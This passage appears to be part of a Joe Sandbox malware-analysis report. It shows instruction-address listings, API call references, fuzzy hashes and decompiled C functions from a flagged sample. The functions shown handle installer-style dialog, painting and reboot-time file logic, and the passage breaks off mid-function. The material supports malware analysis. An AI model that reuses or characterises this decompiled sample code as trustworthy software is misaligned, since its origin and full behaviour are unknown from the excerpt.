                                                                                        0x004051d2
                                                                                        0x004051d9
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405293
                                                                                        0x00405293
                                                                                        0x0040529a
                                                                                        0x0040530b
                                                                                        0x00405313
                                                                                        0x0040531b
                                                                                        0x0040531b
                                                                                        0x00405324
                                                                                        0x00405326
                                                                                        0x0040532d
                                                                                        0x00405330
                                                                                        0x00405330
                                                                                        0x00405336
                                                                                        0x0040533d
                                                                                        0x00405340
                                                                                        0x00405340
                                                                                        0x00405346
                                                                                        0x0040534c
                                                                                        0x00405352
                                                                                        0x00405352
                                                                                        0x0040535f
                                                                                        0x004054c0
                                                                                        0x004054c7
                                                                                        0x004054e4
                                                                                        0x004054ea
                                                                                        0x004054fc
                                                                                        0x004054fc
                                                                                        0x00000000
                                                                                        0x00405365
                                                                                        0x00405367
                                                                                        0x0040536c
                                                                                        0x00405371
                                                                                        0x00405376
                                                                                        0x00405378
                                                                                        0x00405378
                                                                                        0x00405379
                                                                                        0x0040537a
                                                                                        0x0040537c
                                                                                        0x0040537c
                                                                                        0x00405384
                                                                                        0x004053c5
                                                                                        0x004053c7
                                                                                        0x004053d7
                                                                                        0x004053da
                                                                                        0x004053df
                                                                                        0x004053e6
                                                                                        0x004053e9
                                                                                        0x0040548b
                                                                                        0x00405494
                                                                                        0x0040549c
                                                                                        0x0040549c
                                                                                        0x004054a2
                                                                                        0x004054aa
                                                                                        0x004054bb
                                                                                        0x004054bb
                                                                                        0x00000000
                                                                                        0x004054aa
                                                                                        0x004053ef
                                                                                        0x004053f2
                                                                                        0x004053f8
                                                                                        0x004053fd
                                                                                        0x004053ff
                                                                                        0x00405401
                                                                                        0x00405407
                                                                                        0x0040540e
                                                                                        0x00405413
                                                                                        0x0040541a
                                                                                        0x0040541d
                                                                                        0x0040541d
                                                                                        0x00405424
                                                                                        0x00405430
                                                                                        0x00405434
                                                                                        0x00405436
                                                                                        0x00405436
                                                                                        0x00405426
                                                                                        0x00405428
                                                                                        0x00405428
                                                                                        0x00405456
                                                                                        0x00405462
                                                                                        0x00405471
                                                                                        0x00405471
                                                                                        0x00405473
                                                                                        0x00405476
                                                                                        0x0040547f
                                                                                        0x00000000
                                                                                        0x00405386
                                                                                        0x00405391
                                                                                        0x00405394
                                                                                        0x00405399
                                                                                        0x0040539b
                                                                                        0x0040539f
                                                                                        0x004053af
                                                                                        0x004053b9
                                                                                        0x004053bb
                                                                                        0x004053be
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004053a1
                                                                                        0x004053a1
                                                                                        0x004053a7
                                                                                        0x004053a9
                                                                                        0x004053a9
                                                                                        0x004053aa
                                                                                        0x004053ab
                                                                                        0x00000000
                                                                                        0x004053a1
                                                                                        0x00405384
                                                                                        0x0040535f
                                                                                        0x004052a2
                                                                                        0x00000000
                                                                                        0x004052b8
                                                                                        0x004052c2
                                                                                        0x004052c7
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004052d9
                                                                                        0x004052de
                                                                                        0x004052ea
                                                                                        0x004052ea
                                                                                        0x004052ec
                                                                                        0x004052fb
                                                                                        0x004052fd
                                                                                        0x00405301
                                                                                        0x00405304
                                                                                        0x00000000
                                                                                        0x00405304
                                                                                        0x004052a2
                                                                                        0x00404f58
                                                                                        0x00404f5d
                                                                                        0x00404f66
                                                                                        0x00404f6d
                                                                                        0x00404f7f
                                                                                        0x00404f8a
                                                                                        0x00404f90
                                                                                        0x00404f9e
                                                                                        0x00404fb2
                                                                                        0x00404fb7
                                                                                        0x00404fc4
                                                                                        0x00404fc9
                                                                                        0x00404fdf
                                                                                        0x00404ff0
                                                                                        0x00404ffd
                                                                                        0x00404ffd
                                                                                        0x00405000
                                                                                        0x00405006
                                                                                        0x00405008
                                                                                        0x0040500b
                                                                                        0x00405010
                                                                                        0x00405015
                                                                                        0x00405017
                                                                                        0x00405017
                                                                                        0x00405037
                                                                                        0x00405037
                                                                                        0x00405039
                                                                                        0x0040503a
                                                                                        0x0040503f
                                                                                        0x00405045
                                                                                        0x00405049
                                                                                        0x0040504e
                                                                                        0x00405056
                                                                                        0x0040505a
                                                                                        0x0040505f
                                                                                        0x00405064
                                                                                        0x0040506c
                                                                                        0x0040506f
                                                                                        0x0040513f
                                                                                        0x00405152
                                                                                        0x00000000
                                                                                        0x00405075
                                                                                        0x00405078
                                                                                        0x0040507b
                                                                                        0x0040507e
                                                                                        0x0040507e
                                                                                        0x00405084
                                                                                        0x0040508d
                                                                                        0x00405090
                                                                                        0x00405094
                                                                                        0x00405097
                                                                                        0x0040509a
                                                                                        0x004050a3
                                                                                        0x004050ac
                                                                                        0x004050af
                                                                                        0x004050b2
                                                                                        0x004050b5
                                                                                        0x004050f3
                                                                                        0x0040511e
                                                                                        0x004050f5
                                                                                        0x00405104
                                                                                        0x00405104
                                                                                        0x004050b7
                                                                                        0x004050ba
                                                                                        0x004050c8
                                                                                        0x004050d2
                                                                                        0x004050da
                                                                                        0x004050e1
                                                                                        0x004050ec
                                                                                        0x004050ec
                                                                                        0x004050b5
                                                                                        0x00405124
                                                                                        0x00405125
                                                                                        0x00405131
                                                                                        0x00405131
                                                                                        0x0040513d
                                                                                        0x00405158
                                                                                        0x0040515b
                                                                                        0x00405178
                                                                                        0x00000000
                                                                                        0x0040515d
                                                                                        0x00405162
                                                                                        0x0040516b
                                                                                        0x004054fe
                                                                                        0x00405510
                                                                                        0x00405510
                                                                                        0x0040515b
                                                                                        0x00000000
                                                                                        0x0040513d
                                                                                        0x0040506f

                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,000003F9), ref: 00404F1E
                                                                                        • GetDlgItem.USER32(?,00000408), ref: 00404F29
                                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F73
                                                                                        • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F8A
                                                                                        • SetWindowLongW.USER32(?,000000FC,00405513), ref: 00404FA3
                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FB7
                                                                                        • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FC9
                                                                                        • SendMessageW.USER32(?,00001109,00000002), ref: 00404FDF
                                                                                        • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FEB
                                                                                        • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FFD
                                                                                        • DeleteObject.GDI32(00000000), ref: 00405000
                                                                                        • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040502B
                                                                                        • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405037
                                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D2
                                                                                        • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405102
                                                                                          • Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405116
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00405144
                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405152
                                                                                        • ShowWindow.USER32(?,00000005), ref: 00405162
                                                                                        • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040525D
                                                                                        • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C2
                                                                                        • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052D7
                                                                                        • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052FB
                                                                                        • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040531B
                                                                                        • ImageList_Destroy.COMCTL32(?), ref: 00405330
                                                                                        • GlobalFree.KERNEL32(?), ref: 00405340
                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053B9
                                                                                        • SendMessageW.USER32(?,00001102,?,?), ref: 00405462
                                                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405471
                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 0040549C
                                                                                        • ShowWindow.USER32(?,00000000), ref: 004054EA
                                                                                        • GetDlgItem.USER32(?,000003FE), ref: 004054F5
                                                                                        • ShowWindow.USER32(00000000), ref: 004054FC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                        • String ID: $M$N
                                                                                        • API String ID: 2564846305-813528018
                                                                                        • Opcode ID: 749bdf8e43bd841ecb3e5c95033ce80d775c45143b483fe0b3b59f6494973967
                                                                                        • Instruction ID: 669472b6e39b4296dbb294a81ed98d86f32f22d8abeb4cff7518c6a892085abf
                                                                                        • Opcode Fuzzy Hash: 749bdf8e43bd841ecb3e5c95033ce80d775c45143b483fe0b3b59f6494973967
                                                                                        • Instruction Fuzzy Hash: EF028A70900608EFDB20DFA9DD45AAF7BB5FB84314F10817AE610BA2E0D7799942DF58
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 92%
                                                                                        			E00404658(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
                                                                                        				intOrPtr _v8;
                                                                                        				int _v12;
                                                                                        				void* _v16;
                                                                                        				struct HWND__* _t56;
                                                                                        				intOrPtr _t69;
                                                                                        				signed int _t75;
                                                                                        				signed short* _t76;
                                                                                        				signed short* _t78;
                                                                                        				long _t92;
                                                                                        				int _t103;
                                                                                        				signed int _t110;
                                                                                        				intOrPtr _t111;
                                                                                        				intOrPtr _t113;
                                                                                        				WCHAR* _t114;
                                                                                        				signed int* _t116;
                                                                                        				WCHAR* _t117;
                                                                                        				struct HWND__* _t118;
                                                                                        
                                                                                        				if(_a8 != 0x110) {
                                                                                        					if(_a8 != 0x111) {
                                                                                        						L13:
                                                                                        						if(_a8 != 0x4e) {
                                                                                        							if(_a8 == 0x40b) {
                                                                                        								 *0x42b234 =  *0x42b234 + 1;
                                                                                        							}
                                                                                        							L27:
                                                                                        							_t114 = _a16;
                                                                                        							L28:
                                                                                        							return E00404500(_a8, _a12, _t114);
                                                                                        						}
                                                                                        						_t56 = GetDlgItem(_a4, 0x3e8);
                                                                                        						_t114 = _a16;
                                                                                        						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
                                                                                        							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
                                                                                        							_t113 =  *((intOrPtr*)(_t114 + 0x18));
                                                                                        							_v12 = _t103;
                                                                                        							_v16 = _t113;
                                                                                        							_v8 = 0x432ea0;
                                                                                        							if(_t103 - _t113 < 0x800) {
                                                                                        								SendMessageW(_t56, 0x44b, 0,  &_v16);
                                                                                        								SetCursor(LoadCursorW(0, 0x7f02));
                                                                                        								_push(1);
                                                                                        								E00404907(_a4, _v8);
                                                                                        								SetCursor(LoadCursorW(0, 0x7f00));
                                                                                        								_t114 = _a16;
                                                                                        							}
                                                                                        						}
                                                                                        						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
                                                                                        							goto L28;
                                                                                        						} else {
                                                                                        							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
                                                                                        								SendMessageW( *0x434f08, 0x111, 1, 0);
                                                                                        							}
                                                                                        							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
                                                                                        								SendMessageW( *0x434f08, 0x10, 0, 0);
                                                                                        							}
                                                                                        							return 1;
                                                                                        						}
                                                                                        					}
                                                                                        					if(_a12 >> 0x10 != 0 ||  *0x42b234 != 0) {
                                                                                        						goto L27;
                                                                                        					} else {
                                                                                        						_t69 =  *0x42c240; // 0x51cefc
                                                                                        						_t29 = _t69 + 0x14; // 0x51cf10
                                                                                        						_t116 = _t29;
                                                                                        						if(( *_t116 & 0x00000020) == 0) {
                                                                                        							goto L27;
                                                                                        						}
                                                                                        						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                                                        						E004044BB(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                                                        						E004048E3();
                                                                                        						goto L13;
                                                                                        					}
                                                                                        				}
                                                                                        				_t117 = _a16;
                                                                                        				_t75 =  *(_t117 + 0x30);
                                                                                        				if(_t75 < 0) {
                                                                                        					_t111 =  *0x433edc; // 0x51f5e2
                                                                                        					_t75 =  *(_t111 - 4 + _t75 * 4);
                                                                                        				}
                                                                                        				_t76 =  *0x434f38 + _t75 * 2;
                                                                                        				_t110 =  *_t76 & 0x0000ffff;
                                                                                        				_a8 = _t110;
                                                                                        				_t78 =  &(_t76[1]);
                                                                                        				_a16 = _t78;
                                                                                        				_v16 = _t78;
                                                                                        				_v12 = 0;
                                                                                        				_v8 = E00404609;
                                                                                        				if(_t110 != 2) {
                                                                                        					_v8 = E004045CF;
                                                                                        				}
                                                                                        				_push( *((intOrPtr*)(_t117 + 0x34)));
                                                                                        				_push(0x22);
                                                                                        				E00404499(_a4);
                                                                                        				_push( *((intOrPtr*)(_t117 + 0x38)));
                                                                                        				_push(0x23);
                                                                                        				E00404499(_a4);
                                                                                        				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                                                        				E004044BB( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
                                                                                        				_t118 = GetDlgItem(_a4, 0x3e8);
                                                                                        				E004044CE(_t118);
                                                                                        				SendMessageW(_t118, 0x45b, 1, 0);
                                                                                        				_t92 =  *( *0x434f10 + 0x68);
                                                                                        				if(_t92 < 0) {
                                                                                        					_t92 = GetSysColor( ~_t92);
                                                                                        				}
                                                                                        				SendMessageW(_t118, 0x443, 0, _t92);
                                                                                        				SendMessageW(_t118, 0x445, 0, 0x4010000);
                                                                                        				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
                                                                                        				 *0x42b234 = 0;
                                                                                        				SendMessageW(_t118, 0x449, _a8,  &_v16);
                                                                                        				 *0x42b234 = 0;
                                                                                        				return 0;
                                                                                        			}




















                                                                                        0x0040466a
                                                                                        0x00404797
                                                                                        0x004047f4
                                                                                        0x004047f8
                                                                                        0x004048c5
                                                                                        0x004048c7
                                                                                        0x004048c7
                                                                                        0x004048cd
                                                                                        0x004048cd
                                                                                        0x004048d0
                                                                                        0x00000000
                                                                                        0x004048d7
                                                                                        0x00404806
                                                                                        0x0040480c
                                                                                        0x00404816
                                                                                        0x00404821
                                                                                        0x00404824
                                                                                        0x00404827
                                                                                        0x00404832
                                                                                        0x00404835
                                                                                        0x0040483c
                                                                                        0x00404849
                                                                                        0x0040485a
                                                                                        0x00404860
                                                                                        0x00404868
                                                                                        0x00404876
                                                                                        0x0040487c
                                                                                        0x0040487c
                                                                                        0x0040483c
                                                                                        0x00404886
                                                                                        0x00000000
                                                                                        0x00404891
                                                                                        0x00404895
                                                                                        0x004048a5
                                                                                        0x004048a5
                                                                                        0x004048ab
                                                                                        0x004048b7
                                                                                        0x004048b7
                                                                                        0x00000000
                                                                                        0x004048bb
                                                                                        0x00404886
                                                                                        0x004047a2
                                                                                        0x00000000
                                                                                        0x004047b4
                                                                                        0x004047b4
                                                                                        0x004047b9
                                                                                        0x004047b9
                                                                                        0x004047bf
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004047e8
                                                                                        0x004047ea
                                                                                        0x004047ef
                                                                                        0x00000000
                                                                                        0x004047ef
                                                                                        0x004047a2
                                                                                        0x00404670
                                                                                        0x00404673
                                                                                        0x00404678
                                                                                        0x0040467a
                                                                                        0x00404689
                                                                                        0x00404689
                                                                                        0x00404691
                                                                                        0x00404694
                                                                                        0x00404698
                                                                                        0x0040469b
                                                                                        0x0040469f
                                                                                        0x004046a2
                                                                                        0x004046a5
                                                                                        0x004046a8
                                                                                        0x004046af
                                                                                        0x004046b1
                                                                                        0x004046b1
                                                                                        0x004046bb
                                                                                        0x004046c8
                                                                                        0x004046d2
                                                                                        0x004046d7
                                                                                        0x004046da
                                                                                        0x004046df
                                                                                        0x004046f6
                                                                                        0x004046fd
                                                                                        0x00404710
                                                                                        0x00404713
                                                                                        0x00404727
                                                                                        0x0040472e
                                                                                        0x00404733
                                                                                        0x00404738
                                                                                        0x00404738
                                                                                        0x00404746
                                                                                        0x00404754
                                                                                        0x00404766
                                                                                        0x0040476b
                                                                                        0x0040477b
                                                                                        0x0040477d
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046F6
                                                                                        • GetDlgItem.USER32(?,000003E8), ref: 0040470A
                                                                                        • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404727
                                                                                        • GetSysColor.USER32(?), ref: 00404738
                                                                                        • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404746
                                                                                        • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404754
                                                                                        • lstrlenW.KERNEL32(?), ref: 00404759
                                                                                        • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404766
                                                                                        • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040477B
                                                                                        • GetDlgItem.USER32(?,0000040A), ref: 004047D4
                                                                                        • SendMessageW.USER32(00000000), ref: 004047DB
                                                                                        • GetDlgItem.USER32(?,000003E8), ref: 00404806
                                                                                        • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404849
                                                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 00404857
                                                                                        • SetCursor.USER32(00000000), ref: 0040485A
                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00404873
                                                                                        • SetCursor.USER32(00000000), ref: 00404876
                                                                                        • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048A5
                                                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048B7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                        • String ID: Call$N
                                                                                        • API String ID: 3103080414-3438112850
                                                                                        • Opcode ID: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
                                                                                        • Instruction ID: e0aa441e67ff77812dea5cfa76c138b5706349c0d06c8e95e02877fce1cb63d1
                                                                                        • Opcode Fuzzy Hash: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
                                                                                        • Instruction Fuzzy Hash: 1A61A3B5900209BFDB10AF60DD85E6A7BA9FB44314F00843AFB05B62D0D778A951DF98
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 90%
                                                                                        			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                                                        				struct tagLOGBRUSH _v16;
                                                                                        				struct tagRECT _v32;
                                                                                        				struct tagPAINTSTRUCT _v96;
                                                                                        				struct HDC__* _t70;
                                                                                        				struct HBRUSH__* _t87;
                                                                                        				struct HFONT__* _t94;
                                                                                        				long _t102;
                                                                                        				signed int _t126;
                                                                                        				struct HDC__* _t128;
                                                                                        				intOrPtr _t130;
                                                                                        
                                                                                        				if(_a8 == 0xf) {
                                                                                        					_t130 =  *0x434f10;
                                                                                        					_t70 = BeginPaint(_a4,  &_v96);
                                                                                        					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                                                        					_a8 = _t70;
                                                                                        					GetClientRect(_a4,  &_v32);
                                                                                        					_t126 = _v32.bottom;
                                                                                        					_v32.bottom = _v32.bottom & 0x00000000;
                                                                                        					while(_v32.top < _t126) {
                                                                                        						_a12 = _t126 - _v32.top;
                                                                                        						asm("cdq");
                                                                                        						asm("cdq");
                                                                                        						asm("cdq");
                                                                                        						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                                                        						_t87 = CreateBrushIndirect( &_v16);
                                                                                        						_v32.bottom = _v32.bottom + 4;
                                                                                        						_a16 = _t87;
                                                                                        						FillRect(_a8,  &_v32, _t87);
                                                                                        						DeleteObject(_a16);
                                                                                        						_v32.top = _v32.top + 4;
                                                                                        					}
                                                                                        					if( *(_t130 + 0x58) != 0xffffffff) {
                                                                                        						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
                                                                                        						_a16 = _t94;
                                                                                        						if(_t94 != 0) {
                                                                                        							_t128 = _a8;
                                                                                        							_v32.left = 0x10;
                                                                                        							_v32.top = 8;
                                                                                        							SetBkMode(_t128, 1);
                                                                                        							SetTextColor(_t128,  *(_t130 + 0x58));
                                                                                        							_a8 = SelectObject(_t128, _a16);
                                                                                        							DrawTextW(_t128, 0x433f00, 0xffffffff,  &_v32, 0x820);
                                                                                        							SelectObject(_t128, _a8);
                                                                                        							DeleteObject(_a16);
                                                                                        						}
                                                                                        					}
                                                                                        					EndPaint(_a4,  &_v96);
                                                                                        					return 0;
                                                                                        				}
                                                                                        				_t102 = _a16;
                                                                                        				if(_a8 == 0x46) {
                                                                                        					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                                                        					 *((intOrPtr*)(_t102 + 4)) =  *0x434f08;
                                                                                        				}
                                                                                        				return DefWindowProcW(_a4, _a8, _a12, _t102);
                                                                                        			}













                                                                                        0x0040100a
                                                                                        0x00401039
                                                                                        0x00401047
                                                                                        0x0040104d
                                                                                        0x00401051
                                                                                        0x0040105b
                                                                                        0x00401061
                                                                                        0x00401064
                                                                                        0x004010f3
                                                                                        0x00401089
                                                                                        0x0040108c
                                                                                        0x004010a6
                                                                                        0x004010bd
                                                                                        0x004010cc
                                                                                        0x004010cf
                                                                                        0x004010d5
                                                                                        0x004010d9
                                                                                        0x004010e4
                                                                                        0x004010ed
                                                                                        0x004010ef
                                                                                        0x004010ef
                                                                                        0x00401100
                                                                                        0x00401105
                                                                                        0x0040110d
                                                                                        0x00401110
                                                                                        0x00401112
                                                                                        0x00401118
                                                                                        0x0040111f
                                                                                        0x00401126
                                                                                        0x00401130
                                                                                        0x00401142
                                                                                        0x00401156
                                                                                        0x00401160
                                                                                        0x00401165
                                                                                        0x00401165
                                                                                        0x00401110
                                                                                        0x0040116e
                                                                                        0x00000000
                                                                                        0x00401178
                                                                                        0x00401010
                                                                                        0x00401013
                                                                                        0x00401015
                                                                                        0x0040101f
                                                                                        0x0040101f
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                        • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                        • DeleteObject.GDI32(?), ref: 004010ED
                                                                                        • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                        • DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                        • DeleteObject.GDI32(?), ref: 00401165
                                                                                        • EndPaint.USER32(?,?), ref: 0040116E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                        • String ID: F
                                                                                        • API String ID: 941294808-1304234792
                                                                                        • Opcode ID: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
                                                                                        • Instruction ID: e457e53e67a16f607b198c8be77aa7e47a8fd9e6aa67a1a07366d16d1d2d9a76
                                                                                        • Opcode Fuzzy Hash: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
                                                                                        • Instruction Fuzzy Hash: 0E418B71800209AFCF058FA5DE459AF7FB9FF44315F04802AF991AA1A0C738AA55DFA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E00406183(void* __ecx) {
                                                                                        				void* __ebx;
                                                                                        				void* __edi;
                                                                                        				void* __esi;
                                                                                        				long _t12;
                                                                                        				long _t24;
                                                                                        				char* _t31;
                                                                                        				int _t37;
                                                                                        				void* _t38;
                                                                                        				intOrPtr* _t39;
                                                                                        				long _t42;
                                                                                        				WCHAR* _t44;
                                                                                        				void* _t46;
                                                                                        				void* _t48;
                                                                                        				void* _t49;
                                                                                        				void* _t52;
                                                                                        				void* _t53;
                                                                                        
                                                                                        				_t38 = __ecx;
                                                                                        				_t44 =  *(_t52 + 0x14);
                                                                                        				 *0x430908 = 0x55004e;
                                                                                        				 *0x43090c = 0x4c;
                                                                                        				if(_t44 == 0) {
                                                                                        					L3:
                                                                                        					_t12 = GetShortPathNameW( *(_t52 + 0x1c), 0x431108, 0x400);
                                                                                        					if(_t12 != 0 && _t12 <= 0x400) {
                                                                                        						_t37 = wsprintfA(0x430508, "%ls=%ls\r\n", 0x430908, 0x431108);
                                                                                        						_t53 = _t52 + 0x10;
                                                                                        						E0040657A(_t37, 0x400, 0x431108, 0x431108,  *((intOrPtr*)( *0x434f10 + 0x128)));
                                                                                        						_t12 = E0040602D(0x431108, 0xc0000000, 4);
                                                                                        						_t48 = _t12;
                                                                                        						 *(_t53 + 0x18) = _t48;
                                                                                        						if(_t48 != 0xffffffff) {
                                                                                        							_t42 = GetFileSize(_t48, 0);
                                                                                        							_t6 = _t37 + 0xa; // 0xa
                                                                                        							_t46 = GlobalAlloc(0x40, _t42 + _t6);
